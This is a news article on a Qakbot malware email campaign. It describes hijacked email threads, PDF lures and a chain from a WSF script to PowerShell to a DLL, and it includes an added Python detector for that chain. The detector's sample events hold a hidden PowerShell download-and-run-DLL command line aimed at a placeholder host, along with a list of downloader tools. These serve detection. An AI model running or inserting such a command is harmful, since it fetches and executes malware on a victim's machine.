Researchers are seeing a “significant increase” in attacks deploying the Qakbot malware, which have targeted victims in Germany, Argentina, Italy, Algeria, Spain, the U.S. and other countries with emails containing PDF attachments that deliver the banking trojan.
Qakbot, which was first detected in 2007, has since grown into a multi-purpose malware with multiple functionalities, including tools for performing reconnaissance, exfiltrating data and delivering other payloads. Its modular nature gives it flexibility for keeping up with the evolving threat landscape, and the malware has recently seen growing popularity among a variety of threat groups that either use its various capabilities or any of its second-stage payloads.
Attackers deploying the malware have previously relied on hijacked email threads (harvested in bulk through the Microsoft Exchange ProxyLogon flaws), as detailed last year by Cisco Talos researchers; this more recent spate of infections relies on a similar method, Kaspersky researchers said Monday. They said at least 4,500 spam emails have been sent in this wave of attacks, which they first observed on April 4. The campaign has targeted corporate email accounts, with victims in the hospitality, wholesale and IT sectors.
“The malware would be delivered through e-mail letters written in different languages — variations of them were coming in English, German, Italian, and French,” said Victoria Vlasova, Andrey Kovtun and Darya Ivanova, researchers with Kaspersky, in a Monday report. “The messages were based on real business letters the attackers had gotten access to, which afforded them the opportunity to join the correspondence thread with messages of their own.”
Attackers are using imitations of business emails they were able to access in order to lure users into opening the PDF; the legitimate senders’ names populate the “From” field, but the sending address actually belongs to a fraudulent account. These emails have a variety of business-related pretexts. In some emails, for instance, attackers asked targets to provide all the documentation pertaining to an attached “application,” or to calculate the contract value based on attached “cost estimates.”
“Hackers gain access to genuine business correspondence (QBot, among other things, steals locally stored emails from previous victims’ computers) and join the dialogue, sending their messages as if they’re carrying on an old conversation,” said Darya Ivanova, malware analyst at Kaspersky. “We assume that the attackers steal the correspondence, but do not get access to the email account. This means they typically send messages from their own email address intended for malicious activities.”
The PDF imitates a Microsoft Office 365 or Azure alert telling the user to click Open to view attached files; if clicked, it eventually leads to a downloaded archive containing a Windows Script File (WSF), which in turn executes a PowerShell script. This script uses wget to download a DLL file from a remote server, which eventually delivers Qakbot. This attack chain differs slightly from previous infections, said Ivanova, which have instead used malicious scripts in password-protected archives, malicious scripts dropped from HTML files, malicious scripts embedded in OneNote documents, and WSF files wrapped in IMG files inside password-protected archives.
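The WSF-to-PowerShell-to-DLL chain described above is visible in process-creation telemetry, because the script host is the parent of the PowerShell process that fetches the DLL. The detector below is an added example, not code from the Kaspersky report; the event records, paths and host name are constructed placeholders, not indicators from the campaign.

```python
"""Flag a Windows script host launching PowerShell that downloads a DLL.
Example added to this article; event shape is modelled on Sysmon Event ID 1
process-creation records (constructed sample data, not real telemetry)."""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # executable file name, lower-cased on ingest
    cmdline: str


# Constructed sample events: one benign PowerShell, one benign script host,
# and one chain matching the article (wscript.exe -> powershell.exe -> DLL).
SAMPLE_EVENTS = [
    ProcEvent(100, 1, "explorer.exe", "C:\\Windows\\explorer.exe"),
    ProcEvent(200, 100, "wscript.exe", 'wscript.exe "C:\\Users\\u\\Downloads\\Invoice.wsf"'),
    ProcEvent(300, 200, "powershell.exe",
              "powershell.exe -w hidden -c wget http://example.invalid/x -OutFile $env:TEMP\\lib.dll"),
    ProcEvent(400, 300, "rundll32.exe", "rundll32.exe C:\\Users\\u\\AppData\\Local\\Temp\\lib.dll,Start"),
    ProcEvent(500, 100, "powershell.exe", "powershell.exe -c Get-ChildItem"),
    ProcEvent(600, 100, "wscript.exe", 'wscript.exe "C:\\Scripts\\logon.vbs"'),
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# wget/curl/iwr are built-in PowerShell aliases for Invoke-WebRequest.
DOWNLOADER = re.compile(r"\b(wget|curl|iwr|Invoke-WebRequest|Start-BitsTransfer|DownloadFile)\b", re.I)
DLL_TARGET = re.compile(r"\.dll\b", re.I)


def find_wsf_powershell_chain(events):
    """Return (script_host_pid, powershell_pid) pairs where a script host is the
    parent of a PowerShell process whose command line downloads a DLL.
    Parentage is resolved by PPID, so PowerShell started directly by the user
    (event 500 above) is not flagged even though it is PowerShell."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for e in events:
        if e.image != "powershell.exe":
            continue
        parent = by_pid.get(e.ppid)
        if parent is None or parent.image not in SCRIPT_HOSTS:
            continue
        if DOWNLOADER.search(e.cmdline) and DLL_TARGET.search(e.cmdline):
            hits.append((parent.pid, e.pid))
    return hits
```

Running it over the sample yields a single hit, the wscript.exe (PID 200) to powershell.exe (PID 300) pair; the same parent-child logic can be expressed as a Sysmon or EDR rule on ParentImage and CommandLine.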
“We have analyzed the Qbot samples from the current e-mail campaign. The bot’s configuration block features company name ‘obama249’ and time stamp ‘1680763529’ (corresponding to April 6, 2023 6:45:29), as well as over a hundred IP addresses the bot will be using to connect to command servers,” said researchers. “Most of these addresses belong to those users, whose infected systems provide an entry point into the chain which is used to redirect the botnet traffic to real command servers.”
The banking trojan has received various module modifications over time to improve its effectiveness, and its distribution methods have also evolved from compromised websites in its early days to now include phishing and spam attacks. However, researchers said that the malware’s functionality has remained mostly unchanged over the past few years.
“As before, the bot is capable of extracting passwords and cookies from browsers, stealing letters from your mailbox, intercepting traffic, and giving operators remote access to the infected system,” said researchers. “Depending on the value of the victim, additional malware can be downloaded locally, such as CobaltStrike (to spread the infection through the corporate network) or various ransomware. Or else the victim’s computer can be turned into a proxy server to facilitate redirection of traffic, including spam traffic.”